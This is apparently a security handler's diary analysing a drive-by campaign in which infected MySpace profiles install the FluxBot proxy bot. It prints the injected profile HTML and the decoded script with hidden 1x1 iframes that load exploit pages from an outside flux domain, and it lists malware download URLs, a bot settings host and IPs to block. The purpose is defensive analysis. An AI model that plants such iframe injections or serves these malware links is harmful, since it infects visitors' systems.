CAREFUL! This diary contains links to malicious code!
A number of MySpace profiles include drive by exploits. The exploits will install a version of "flux bot", a very popular proxy network bot.
FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex ever changing networks of proxy servers. A system infected with FluxBot will be used a one of these proxies.
Infected MySpace "Friend IDs": 39184135, 171598920, 22057010
A typical excerpt from an infected profile (obfuscated to protect the innocent):
<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.dusanbut.com/login.php"><img
style="border-width:0px;width:1280px;height:220px;"
src="http://x.myspace.com/images/clear.gif"></a></style>
The actual exploit / malware is served via an existing flux network. *.dusanbut.com will redirect the user to an encoded javascript which decodes to:
<script>window.status="Done"</script>
<iframe src="http://fafb4c4c .com/header_03.gif" width=1
height=1></iframe>
The domain used here is of course again served via flux. header_03.gif
<script>window.status="Done"</script>
<iframe src="http://fafb4c4c .com/routine.php" width=1
height=1></iframe>
Are we there yet? yup. just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:
http://fafb4c4c .com/session.exe (this is just the downloader stub)
The downloader will now retrieve the actual bot. We have seen among others these
URLs:
http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe
Settings for the bot can be found here:
http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe
once its all set and done, you will be a proud new member of the flux net and soon you
will find your system to participate in phishing and similar endevours.
Couple IPs that may be worthwhile to block:
AS13767 | 72.232.254.218
AS15083 | 65.111.176.176
AS25761 | 72.20.18.86
AS25761 | 72.20.6.10
As you can imagine, its a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.
I will be teaching next:
Application Security: Securing Web Apps, APIs, and Microservices - SANS London June 2022